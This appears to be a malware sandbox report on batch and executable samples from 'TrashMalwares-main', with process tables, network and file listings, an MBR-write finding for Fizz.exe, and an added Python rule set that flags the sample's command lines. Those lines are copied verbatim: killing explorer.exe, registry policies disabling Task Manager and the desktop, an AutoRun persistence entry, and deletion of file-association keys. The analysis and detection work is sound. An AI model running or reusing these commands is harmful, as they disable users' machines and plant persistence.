| C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe | "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca |
| C:\Windows\explorer.exe | explorer.exe |
| C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe | "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca |
| C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca |
| C:\Windows\explorer.exe | explorer.exe |
| C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe | "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca |
| C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca |
| C:\Windows\explorer.exe | explorer.exe |
| C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe | "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca |
| C:\Windows\explorer.exe | explorer.exe |
| C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe | "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca |
| C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca |
| C:\Windows\explorer.exe | explorer.exe |
| C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe | "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca |
| C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca |
| C:\Windows\explorer.exe | explorer.exe |
| C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe | "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca |
| C:\Windows\explorer.exe | explorer.exe |
| C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe | "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca |
| C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca |
| C:\Windows\explorer.exe | explorer.exe |
| C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe | "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca |
| C:\Windows\explorer.exe | explorer.exe |
| C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe | "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca |
| C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca |
| C:\Windows\explorer.exe | explorer.exe |
| C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe | "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca |
| C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca |
| C:\Windows\explorer.exe | explorer.exe |
| C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe | "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca |
| C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca |
| C:\Windows\explorer.exe | explorer.exe |
| C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe | "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca |
| C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca |
| C:\Windows\explorer.exe | explorer.exe |
| C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe | "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca |
| C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca |
| C:\Windows\explorer.exe | explorer.exe |
| C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe | "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca |
| C:\Windows\explorer.exe | explorer.exe |
| C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe | "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca |
| C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca |
| C:\Windows\explorer.exe | explorer.exe |
| C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe | "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca |
| C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca |
| C:\Windows\explorer.exe | explorer.exe |
| C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe | "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca |
| C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca |
| C:\Windows\explorer.exe | explorer.exe |
| C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe | "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca |
| C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca |
| C:\Windows\explorer.exe | explorer.exe |
| C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe | "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca |
| C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca |
| C:\Windows\explorer.exe | explorer.exe |
| C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe | "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca |
| C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca |
| C:\Windows\explorer.exe | explorer.exe |
| C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe | "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca |
| C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca |
| C:\Windows\explorer.exe | explorer.exe |
| C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe | "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca |
| C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca |
| C:\Windows\explorer.exe | explorer.exe |
| C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe | "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca |
| C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca |
| C:\Windows\explorer.exe | explorer.exe |
| C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe | "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca |
| C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca |
| C:\Windows\explorer.exe | explorer.exe |
| C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe | "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca |
| C:\Windows\explorer.exe | explorer.exe |
| C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe | "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca |
| C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca |
| C:\Windows\explorer.exe | explorer.exe |
| C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe | "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca |
| C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca |
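The process chain above is the whole of the visible tradecraft: FaZoN.bat kills explorer.exe, pushes Explorer and System policy values through reg.exe, registers a Command Processor AutoRun (so every cmd.exe launch would run gosha.bat) and tries to delete the .exe, .dll and wildcard classes under HKCR; everything after that is explorer.exe and its Start Menu / Search hosts restarting. The following is an added detection example, not part of the sandbox report or of the sample. It runs a small rule set over process-creation command lines as a Sysmon Event ID 1 or Security 4688 pipeline would see them; SAMPLE_EVENTS copies the command lines from the Processes section, with constructed process IDs, and the rule names are this example's own. The rules key on value names and targets (DisableTaskMgr, NoDesktop, AutoRun) rather than on exact key paths, because two of the sample's commands are ineffective on the host yet still worth flagging: the Polices\System line only creates an inert misspelled key, and reg.exe rejects the HKCR/.exe form because of the forward slash.

```python
"""Rule-based triage of the cmd.exe / reg.exe chain seen in the FaZoN.bat detonation.

Added example, not part of the sandbox report. Input is a list of
process-creation events (Sysmon Event ID 1 or Security 4688 style) with a
CommandLine field. SAMPLE_EVENTS copies the command lines listed in the
Processes section above; the ProcessId values are constructed.
"""
import re
from typing import Dict, List

# Rules key on value names and targets rather than on exact key paths, so a
# misspelled path (Polices\System in the sample) or a malformed root
# (HKCR/.exe, which reg.exe rejects) still registers as the same intent.
RULES = [
    ("kills_explorer",
     re.compile(r"\btaskkill\b.*/im\s+explorer\.exe", re.I)),
    ("restrictrun_policy",
     re.compile(r"\breg\s+add\b.*\\Policies\\Explorer\\RestrictRun\b", re.I)),
    ("disable_taskmgr",
     re.compile(r"\breg\s+add\b.*/v\s+DisableTaskMgr\b", re.I)),
    ("hide_desktop",
     re.compile(r"\breg\s+add\b.*/v\s+NoDesktop\b", re.I)),
    ("cmd_autorun_persistence",
     re.compile(r"\breg\s+add\b.*Command Processor.*/v\s+AutoRun\b", re.I)),
    ("file_assoc_tamper",
     re.compile(r"\breg\s+delete\s+HKCR[\\/](\.exe|\.dll|\*)", re.I)),
    ("user_popup",
     re.compile(r"\bmsg\s+\*", re.I)),
]

# Policy tampering and persistence are high; a popup on its own is only low.
HIGH_SEVERITY = {"restrictrun_policy", "disable_taskmgr", "hide_desktop",
                 "cmd_autorun_persistence", "file_assoc_tamper"}

# Constructed event list: command lines from the report, PIDs made up.
SAMPLE_EVENTS = [
    {"ProcessId": "1000", "CommandLine": r'C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\FaZoN.bat"'},
    {"ProcessId": "1001", "CommandLine": r'msg * Gosha created by GGmex your computer infected'},
    {"ProcessId": "1002", "CommandLine": r'taskkill /f /im explorer.exe'},
    {"ProcessId": "1003", "CommandLine": r'reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun /v 1 /t REG_DWORD /d C:\Windows\explorer.exe /f'},
    {"ProcessId": "1004", "CommandLine": r'reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Polices\System /v DisableTaskMgr /t REG_DWORD /d 1 /f'},
    {"ProcessId": "1005", "CommandLine": r'reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f'},
    {"ProcessId": "1006", "CommandLine": r'explorer.exe'},
    {"ProcessId": "1007", "CommandLine": r'reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f'},
    {"ProcessId": "1008", "CommandLine": r'reg add "HKCU\SOFTWARE\Microsoft\Command Processor" /v AutoRun /t REG_SZ /d "C:\Windows\syste m32\gosha.bat" /f'},
    {"ProcessId": "1009", "CommandLine": r'reg delete HKCR/.exe'},
    {"ProcessId": "1010", "CommandLine": r'reg delete HKCR/*'},
    {"ProcessId": "1011", "CommandLine": r'"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca'},
]


def classify(cmdline: str) -> List[str]:
    """Names of every rule that matches one command line (empty if none)."""
    return [name for name, rx in RULES if rx.search(cmdline)]


def scan(events: List[Dict[str, str]]) -> Dict[str, List[str]]:
    """Map each triggered rule to the ProcessIds that triggered it, in event order."""
    hits: Dict[str, List[str]] = {}
    for ev in events:
        for name in classify(ev["CommandLine"]):
            hits.setdefault(name, []).append(ev["ProcessId"])
    return hits


def verdict(hits: Dict[str, List[str]]) -> str:
    """'clean' with no hits, 'high' if any high-severity rule fired, else 'low'."""
    if not hits:
        return "clean"
    return "high" if HIGH_SEVERITY & set(hits) else "low"


if __name__ == "__main__":
    found = scan(SAMPLE_EVENTS)
    for rule, pids in found.items():
        print(f"{rule:24s} pids={','.join(pids)}")
    print("verdict:", verdict(found))
```

Because the rules score intent rather than effect, pair a high verdict with a look at the registry on the live host: in this detonation the only reg.exe writes that matter are the HKCU Policies\Explorer and Policies\System values and the Command Processor AutoRun string, and the AutoRun entry is the one that survives a reboot.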
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 81.171.91.138.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 204.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.204.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.71.91.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.73.42.20.in-addr.arpa | udp |
Files
memory/2228-9-0x0000000002FB0000-0x0000000002FB1000-memory.dmp
memory/3384-16-0x00000225E6B70000-0x00000225E6B90000-memory.dmp
memory/3384-18-0x00000225E6B30000-0x00000225E6B50000-memory.dmp
memory/3384-20-0x00000225E6F40000-0x00000225E6F60000-memory.dmp
memory/3568-32-0x0000000004F30000-0x0000000004F31000-memory.dmp
C:\Users\Admin\AppData\Local\Packages\microsoft.windows.search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\KERIKBO1\microsoft.windows[1].xml
| MD5 | 974f0adc8b3b7f482be95139c92926e0 |
| SHA1 | 635f5f7b6f1dda58dd4926f1600dce90652da52a |
| SHA256 | fc71f9b009579b4f8c03f646fca98084ed6133d4f2acc4103ea39c366518c771 |
| SHA512 | 27b57eec2e4da0c23cb6f7e173ac831a039c3c8a76dec063c8b23c2e1d90f2d52dc5916044a1cf09fd235439d28919d31e0eef3870374e682d1f07daac9960b2 |
memory/2264-40-0x00000202F8100000-0x00000202F8120000-memory.dmp
memory/2264-43-0x00000202F7DC0000-0x00000202F7DE0000-memory.dmp
memory/2264-45-0x00000202F84D0000-0x00000202F84F0000-memory.dmp
memory/3920-52-0x00000000045A0000-0x00000000045A1000-memory.dmp
memory/1556-60-0x00000155D9B10000-0x00000155D9B30000-memory.dmp
memory/1556-62-0x00000155D9AD0000-0x00000155D9AF0000-memory.dmp
memory/1556-64-0x00000155DA0E0000-0x00000155DA100000-memory.dmp
memory/4396-76-0x0000000002800000-0x0000000002801000-memory.dmp
memory/3616-84-0x00000157D20C0000-0x00000157D20E0000-memory.dmp
memory/3616-86-0x00000157D2080000-0x00000157D20A0000-memory.dmp
memory/3616-88-0x00000157D26E0000-0x00000157D2700000-memory.dmp
memory/2516-99-0x0000000002AE0000-0x0000000002AE1000-memory.dmp
memory/3632-107-0x000001937A390000-0x000001937A3B0000-memory.dmp
memory/3632-109-0x000001937A350000-0x000001937A370000-memory.dmp
memory/3632-111-0x000001937A760000-0x000001937A780000-memory.dmp
memory/3668-124-0x0000000004B10000-0x0000000004B11000-memory.dmp
memory/4332-132-0x000002EC8B480000-0x000002EC8B4A0000-memory.dmp
memory/4332-134-0x000002EC8B440000-0x000002EC8B460000-memory.dmp
memory/4332-137-0x000002EC8B850000-0x000002EC8B870000-memory.dmp
memory/1196-149-0x0000000004190000-0x0000000004191000-memory.dmp
memory/3616-156-0x000002AA5E220000-0x000002AA5E240000-memory.dmp
memory/3616-158-0x000002AA5DFE0000-0x000002AA5E000000-memory.dmp
memory/3616-161-0x000002AA5E5F0000-0x000002AA5E610000-memory.dmp
memory/4452-171-0x0000000003400000-0x0000000003401000-memory.dmp
memory/4852-179-0x000002DFF7F80000-0x000002DFF7FA0000-memory.dmp
memory/4852-181-0x000002DFF7F40000-0x000002DFF7F60000-memory.dmp
memory/4852-183-0x000002DFF8350000-0x000002DFF8370000-memory.dmp
memory/3480-195-0x0000000004F00000-0x0000000004F01000-memory.dmp
memory/4472-202-0x0000025F94740000-0x0000025F94760000-memory.dmp
memory/4472-204-0x0000025F94700000-0x0000025F94720000-memory.dmp
memory/4472-207-0x0000025F94B00000-0x0000025F94B20000-memory.dmp
memory/3112-217-0x0000000004BD0000-0x0000000004BD1000-memory.dmp
memory/1520-225-0x0000015271140000-0x0000015271160000-memory.dmp
memory/1520-229-0x0000015271510000-0x0000015271530000-memory.dmp
memory/1520-227-0x0000015271100000-0x0000015271120000-memory.dmp
memory/4528-241-0x0000000004AA0000-0x0000000004AA1000-memory.dmp
memory/5060-249-0x000001C263660000-0x000001C263680000-memory.dmp
memory/5060-250-0x000001C263620000-0x000001C263640000-memory.dmp
memory/5060-252-0x000001C263A30000-0x000001C263A50000-memory.dmp
memory/3448-261-0x00000000040D0000-0x00000000040D1000-memory.dmp
memory/4436-269-0x0000019D8AEF0000-0x0000019D8AF10000-memory.dmp
memory/4436-272-0x0000019D8AEB0000-0x0000019D8AED0000-memory.dmp
memory/4436-275-0x0000019D8B4C0000-0x0000019D8B4E0000-memory.dmp
memory/2440-285-0x0000000002560000-0x0000000002561000-memory.dmp
memory/3800-292-0x000002068C240000-0x000002068C260000-memory.dmp
memory/3800-296-0x000002068C600000-0x000002068C620000-memory.dmp
memory/3800-294-0x000002068C200000-0x000002068C220000-memory.dmp
memory/3572-308-0x0000000004BE0000-0x0000000004BE1000-memory.dmp
memory/2924-315-0x000001E5352B0000-0x000001E5352D0000-memory.dmp
memory/2924-317-0x000001E535270000-0x000001E535290000-memory.dmp
memory/2924-319-0x000001E535880000-0x000001E5358A0000-memory.dmp
memory/1448-330-0x00000000028E0000-0x00000000028E1000-memory.dmp
memory/3292-338-0x000001492B5B0000-0x000001492B5D0000-memory.dmp
memory/3292-340-0x000001492B570000-0x000001492B590000-memory.dmp
memory/3292-342-0x000001492B980000-0x000001492B9A0000-memory.dmp
memory/392-353-0x0000000004E90000-0x0000000004E91000-memory.dmp
memory/4436-361-0x000002892CCA0000-0x000002892CCC0000-memory.dmp
memory/4436-363-0x000002892CC60000-0x000002892CC80000-memory.dmp
memory/4436-365-0x000002892D070000-0x000002892D090000-memory.dmp
Analysis: behavioral16
Detonation Overview
Submitted
2024-03-02 20:26
Reported
2024-03-02 20:36
Platform
win10v2004-20240226-en
Max time kernel
122s
Max time network
174s
Command Line
Signatures
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
| File opened for modification | \??\PhysicalDrive0 | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\Fizz.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\Fizz.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: 33 | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\Fizz.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\Fizz.exe
"C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\Fizz.exe"
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x314 0x368
Network
| Country | Destination | Domain | Proto |
| GB | 142.250.178.10:443 | | tcp |
| US | 8.8.8.8:53 | 79.121.231.20.in-addr.arpa | udp |
| US | 13.107.253.64:443 | | tcp |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 189.178.17.96.in-addr.arpa | udp |
